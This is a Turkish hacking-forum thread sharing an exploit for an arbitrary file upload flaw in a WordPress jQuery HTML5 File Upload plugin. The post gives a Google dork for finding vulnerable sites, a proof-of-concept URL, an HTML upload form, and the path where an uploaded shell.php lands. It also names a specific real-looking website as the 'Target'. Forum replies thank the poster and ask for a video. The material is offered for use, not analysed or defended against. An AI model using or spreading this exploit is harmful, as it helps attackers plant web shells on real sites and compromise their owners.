Wordpress jQuery Html5 Plugins File Upload Arbitrary File Upload Vulnerability

[SoulPason]

Güncel exploittir..

#############################

# Exploit Title: Wordpress Plugins jQuery Html5 File Upload Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Date: 2016-04-17
# Exploit Author: AnoaGhost
# Vendor Homepage: https://wordpress.org/plugins/jquery-html5-file-upload/
# Software Link: https://downloads.wordpress.org/plugin/jquery-html5-file-upload.3.0.zip
# Version: Any Version
# Tested on: Windows, Linux

#############################

Poc :
targe.com/wp-admin/admin-ajax.php?action=load_ajax_function

Exploit HTML :

<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By AnoaGhost</font><br>
<form method="POST" action="target.com/
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

Shell Access :
target.com/wp-content/uploads/files/guest/shell.php

Target :
http://students4students.us/wp-admin/admin-ajax.php?action=load_ajax_function

direk link;

 

[CeKu]

videosu varmı kardeşim

 

[Masum]

Paylaşım için teşekkürler hocam